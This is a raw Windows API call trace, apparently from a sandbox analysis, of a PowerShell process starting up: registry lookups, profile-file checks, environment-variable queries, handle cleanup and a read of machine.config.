	[0563.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0563.946] VirtualQuery (in: lpAddress=0x12ba00, lpBuffer=0x12c8c0, dwLength=0x30 | out: lpBuffer=0x12c8c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0563.952] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d858 | out: phkResult=0x12d858*=0x314) returned 0x0
	[0563.952] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d7dc, lpData=0x0, lpcbData=0x12d7d8*=0x0 | out: lpType=0x12d7dc*=0x1, lpData=0x0, lpcbData=0x12d7d8*=0x56) returned 0x0
	[0563.952] CoTaskMemAlloc (cb=0x5a) returned 0x1b860d90
	[0563.952] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d7ac, lpData=0x1b860d90, lpcbData=0x12d7a8*=0x56 | out: lpType=0x12d7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d7a8*=0x56) returned 0x0
	[0563.952] CoTaskMemFree (pv=0x1b860d90) 
	[0563.952] RegCloseKey (hKey=0x314) returned 0x0
	[0563.952] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d858 | out: phkResult=0x12d858*=0x314) returned 0x0
	[0563.952] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d7dc, lpData=0x0, lpcbData=0x12d7d8*=0x0 | out: lpType=0x12d7dc*=0x1, lpData=0x0, lpcbData=0x12d7d8*=0x56) returned 0x0
	[0563.952] CoTaskMemAlloc (cb=0x5a) returned 0x1b860d90
	[0563.952] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d7ac, lpData=0x1b860d90, lpcbData=0x12d7a8*=0x56 | out: lpType=0x12d7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d7a8*=0x56) returned 0x0
	[0563.952] CoTaskMemFree (pv=0x1b860d90) 
	[0563.952] RegCloseKey (hKey=0x314) returned 0x0
	[0563.954] CoTaskMemAlloc (cb=0x20c) returned 0x1b823970
	[0563.954] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b823970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0563.955] CoTaskMemFree (pv=0x1b823970) 
	[0563.956] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0563.956] CoTaskMemAlloc (cb=0x20c) returned 0x1b823970
	[0563.956] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b823970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0563.956] CoTaskMemFree (pv=0x1b823970) 
	[0563.956] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0563.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0563.957] SetErrorMode (uMode=0x1) returned 0x1
	[0563.957] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d7c0 | out: lpFileInformation=0x12d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0563.957] SetErrorMode (uMode=0x1) returned 0x1
	[0563.957] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0563.957] SetErrorMode (uMode=0x1) returned 0x1
	[0563.957] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d7c0 | out: lpFileInformation=0x12d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0563.957] SetErrorMode (uMode=0x1) returned 0x1
	[0563.957] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x12d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0563.957] SetErrorMode (uMode=0x1) returned 0x1
	[0563.957] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d7c0 | out: lpFileInformation=0x12d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0563.958] SetErrorMode (uMode=0x1) returned 0x1
	[0563.958] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x12d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0563.958] SetErrorMode (uMode=0x1) returned 0x1
	[0563.958] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x12d7c0 | out: lpFileInformation=0x12d7c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0563.958] SetErrorMode (uMode=0x1) returned 0x1
	[0563.959] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0563.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.959] CoTaskMemFree (pv=0x2c2100) 
	[0563.959] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0563.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.959] CoTaskMemFree (pv=0x2c2100) 
	[0563.959] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0563.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.959] CoTaskMemFree (pv=0x2c2100) 
	[0563.960] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0563.960] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.960] CoTaskMemFree (pv=0x2c2100) 
	[0563.961] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0563.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.961] CoTaskMemFree (pv=0x2c2100) 
	[0563.962] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0563.962] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0563.962] CoTaskMemFree (pv=0x2c2100) 
	[0563.964] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0563.964] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x12d9a0 | out: lpMode=0x12d9a0) returned 1
	[0565.318] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0565.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.318] CoTaskMemFree (pv=0x2c2100) 
	[0565.321] SetEvent (hEvent=0x310) returned 1
	[0565.321] SetEvent (hEvent=0x3a4) returned 1
	[0565.321] SetEvent (hEvent=0x318) returned 1
	[0565.321] SetEvent (hEvent=0x30c) returned 1
	[0565.323] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0565.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0565.323] CoTaskMemFree (pv=0x2c2100) 
	[0565.323] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d6f8 | out: phkResult=0x12d6f8*=0x360) returned 0x0
	[0565.323] RegQueryValueExW (in: hKey=0x360, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x12d67c, lpData=0x0, lpcbData=0x12d678*=0x0 | out: lpType=0x12d67c*=0x0, lpData=0x0, lpcbData=0x12d678*=0x0) returned 0x2

Thread:
	id = 355
	os_tid = 0xbd4


Thread:
	id = 359
	os_tid = 0xe70


Thread:
	id = 775
	os_tid = 0x17ec


Thread:
	id = 778
	os_tid = 0x17fc


Thread:
	id = 807
	os_tid = 0x107c


Thread:
	id = 826
	os_tid = 0x10d8


Thread:
	id = 828
	os_tid = 0x1100

	[0467.535] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0524.132] LocalFree (hMem=0x2c7340) returned 0x0
	[0524.133] CloseHandle (hObject=0x320) returned 1
	[0524.133] CloseHandle (hObject=0x13) returned 1
	[0524.134] CloseHandle (hObject=0xf) returned 1
	[0524.134] RegCloseKey (hKey=0x310) returned 0x0
	[0524.134] RegCloseKey (hKey=0x30c) returned 0x0
	[0524.135] RegCloseKey (hKey=0x308) returned 0x0
	[0524.135] LocalFree (hMem=0x2c7310) returned 0x0
	[0524.135] RegCloseKey (hKey=0x2e8) returned 0x0
	[0532.222] RegCloseKey (hKey=0x2e8) returned 0x0
	[0535.598] RegCloseKey (hKey=0x2e8) returned 0x0
	[0549.534] RegCloseKey (hKey=0x3a0) returned 0x0
	[0549.534] RegCloseKey (hKey=0x39c) returned 0x0
	[0549.534] RegCloseKey (hKey=0x378) returned 0x0
	[0549.535] RegCloseKey (hKey=0x3b4) returned 0x0
	[0549.535] RegCloseKey (hKey=0x394) returned 0x0
	[0549.535] RegCloseKey (hKey=0x390) returned 0x0
	[0549.535] RegCloseKey (hKey=0x38c) returned 0x0
	[0549.536] RegCloseKey (hKey=0x388) returned 0x0
	[0549.536] RegCloseKey (hKey=0x384) returned 0x0
	[0549.536] RegCloseKey (hKey=0x380) returned 0x0
	[0549.536] RegCloseKey (hKey=0x37c) returned 0x0
	[0549.536] RegCloseKey (hKey=0x354) returned 0x0
	[0549.536] RegCloseKey (hKey=0x3b0) returned 0x0
	[0549.537] RegCloseKey (hKey=0x3ac) returned 0x0
	[0549.537] RegCloseKey (hKey=0x374) returned 0x0
	[0549.537] RegCloseKey (hKey=0x370) returned 0x0
	[0549.537] RegCloseKey (hKey=0x36c) returned 0x0
	[0549.537] RegCloseKey (hKey=0x368) returned 0x0
	[0549.538] RegCloseKey (hKey=0x364) returned 0x0
	[0549.538] RegCloseKey (hKey=0x360) returned 0x0
	[0549.538] RegCloseKey (hKey=0x35c) returned 0x0
	[0549.538] RegCloseKey (hKey=0x358) returned 0x0
	[0549.538] RegCloseKey (hKey=0x3a8) returned 0x0
	[0549.539] RegCloseKey (hKey=0x348) returned 0x0
	[0549.539] RegCloseKey (hKey=0x344) returned 0x0
	[0549.539] RegCloseKey (hKey=0x340) returned 0x0
	[0549.539] RegCloseKey (hKey=0x33c) returned 0x0
	[0549.539] RegCloseKey (hKey=0x338) returned 0x0
	[0549.540] RegCloseKey (hKey=0x320) returned 0x0
	[0549.540] RegCloseKey (hKey=0x310) returned 0x0
	[0549.540] RegCloseKey (hKey=0x30c) returned 0x0
	[0549.540] RegCloseKey (hKey=0x3a4) returned 0x0
	[0549.540] RegCloseKey (hKey=0x2e8) returned 0x0
	[0583.984] RegCloseKey (hKey=0x360) returned 0x0
	[0642.429] CloseHandle (hObject=0x354) returned 1
	[0642.429] CloseHandle (hObject=0x3ac) returned 1
	[0642.429] CloseHandle (hObject=0x380) returned 1
	[0642.430] CloseHandle (hObject=0x3b0) returned 1
	[0642.430] CloseHandle (hObject=0x37c) returned 1
	[0642.430] CloseHandle (hObject=0x360) returned 1
	[0701.733] CloseHandle (hObject=0x384) returned 1
	[0701.733] CloseHandle (hObject=0x354) returned 1
	[0701.734] CloseHandle (hObject=0x388) returned 1
	[0701.734] CloseHandle (hObject=0x3ac) returned 1
	[0701.735] CloseHandle (hObject=0x37c) returned 1
	[0701.735] CloseHandle (hObject=0x360) returned 1
	[0783.642] CloseHandle (hObject=0x42c) returned 1
	[0783.642] CloseHandle (hObject=0x38c) returned 1
	[0783.643] CloseHandle (hObject=0x488) returned 1
	[0783.643] CloseHandle (hObject=0x48c) returned 1
	[0783.644] CloseHandle (hObject=0x430) returned 1
	[0783.644] CloseHandle (hObject=0x3d4) returned 1
	[0783.644] CloseHandle (hObject=0x3d0) returned 1
	[0904.708] CertFreeCRLContext (pCrlContext=0x1b85f790) returned 1
	[0904.708] CertFreeCRLContext (pCrlContext=0x1b85f810) returned 1
	[0904.709] CertFreeCRLContext (pCrlContext=0x1cd77880) returned 1
	[0904.709] CertFreeCRLContext (pCrlContext=0x1b85f790) returned 1
	[0904.710] CertFreeCRLContext (pCrlContext=0x1cd77900) returned 1
	[0904.711] CloseHandle (hObject=0x3dc) returned 1
	[0904.711] CertCloseStore (hCertStore=0x1b8678c0, dwFlags=0x0) returned 1

Thread:
	id = 909
	os_tid = 0x1848


Thread:
	id = 1131
	os_tid = 0x1a00

	[0566.565] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0566.569] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0566.574] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0566.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.574] CoTaskMemFree (pv=0x2c2100) 
	[0566.576] VirtualQuery (in: lpAddress=0x1c8fdc80, lpBuffer=0x1c8feb40, dwLength=0x30 | out: lpBuffer=0x1c8feb40*(BaseAddress=0x1c8fd000, AllocationBase=0x1bf70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0566.581] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0566.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.581] CoTaskMemFree (pv=0x2c2100) 
	[0566.584] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0566.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.584] CoTaskMemFree (pv=0x2c2100) 
	[0566.587] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0566.587] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.587] CoTaskMemFree (pv=0x2c2100) 
	[0566.604] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0566.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.604] CoTaskMemFree (pv=0x2c2100) 
	[0566.607] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0566.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.607] CoTaskMemFree (pv=0x2c2100) 
	[0566.608] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0566.608] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0566.608] CoTaskMemFree (pv=0x2c2100) 
	[0567.894] VirtualQuery (in: lpAddress=0x1c8fdf30, lpBuffer=0x1c8fedf0, dwLength=0x30 | out: lpBuffer=0x1c8fedf0*(BaseAddress=0x1c8fd000, AllocationBase=0x1bf70000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0567.894] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0567.895] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.895] CoTaskMemFree (pv=0x2c2100) 
	[0567.897] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0567.897] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.897] CoTaskMemFree (pv=0x2c2100) 
	[0567.898] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0567.898] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.898] CoTaskMemFree (pv=0x2c2100) 
	[0567.899] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0567.899] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.899] CoTaskMemFree (pv=0x2c2100) 
	[0567.904] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0567.904] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0567.904] CoTaskMemFree (pv=0x2c2100) 
	[0569.474] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0569.474] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.474] CoTaskMemFree (pv=0x2c2100) 
	[0569.476] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0569.477] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.477] CoTaskMemFree (pv=0x2c2100) 
	[0569.478] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0569.478] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0569.478] CoTaskMemFree (pv=0x2c2100) 
	[0569.481] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0569.481] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.866] CoTaskMemFree (pv=0x2c2100) 
	[0570.867] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0570.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.867] CoTaskMemFree (pv=0x2c2100) 
	[0570.869] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0570.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.869] CoTaskMemFree (pv=0x2c2100) 
	[0570.873] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0570.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.874] CoTaskMemFree (pv=0x2c2100) 
	[0570.892] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0570.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0570.892] CoTaskMemFree (pv=0x2c2100) 
	[0574.164] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0574.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.164] CoTaskMemFree (pv=0x2c2100) 
	[0574.168] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0574.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.168] CoTaskMemFree (pv=0x2c2100) 
	[0574.172] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0574.172] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.172] CoTaskMemFree (pv=0x2c2100) 
	[0574.176] CoTaskMemAlloc (cb=0x104) returned 0x2c2100
	[0574.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c2100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0574.176] CoTaskMemFree (pv=0x2c2100) 
	[0626.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c8fd900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0626.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1c8fd800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0630.248] CoTaskMemAlloc (cb=0x20c) returned 0x1b825180
	[0630.248] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b825180, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0630.248] CoTaskMemFree (pv=0x1b825180) 
	[0630.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c8fd960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0635.363] GetCurrentProcess () returned 0xffffffffffffffff
	[0635.363] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1c8fd8c8 | out: TokenHandle=0x1c8fd8c8*=0x360) returned 1
	[0639.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", nBufferLength=0x105, lpBuffer=0x1c8fd520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\", lpFilePart=0x0) returned 0x30
	[0639.495] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c8fd970 | out: lpFileInformation=0x1c8fd970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0639.496] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c8fd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0639.497] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x1c8fd920 | out: lpFileInformation=0x1c8fd920*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf9bf7e3, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xdf9bf7e3, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x76d072b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x622a)) returned 1
	[0639.498] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x1c8fd300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config", lpFilePart=0x0) returned 0x45
	[0639.498] SetErrorMode (uMode=0x1) returned 0x1
	[0639.498] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3b0
	[0639.498] GetFileType (hFile=0x3b0) returned 0x1
	[0639.498] SetErrorMode (uMode=0x1) returned 0x1
	[0639.498] GetFileType (hFile=0x3b0) returned 0x1
	[0639.501] GetFileSize (in: hFile=0x3b0, lpFileSizeHigh=0x1c8fd918 | out: lpFileSizeHigh=0x1c8fd918*=0x0) returned 0x622a
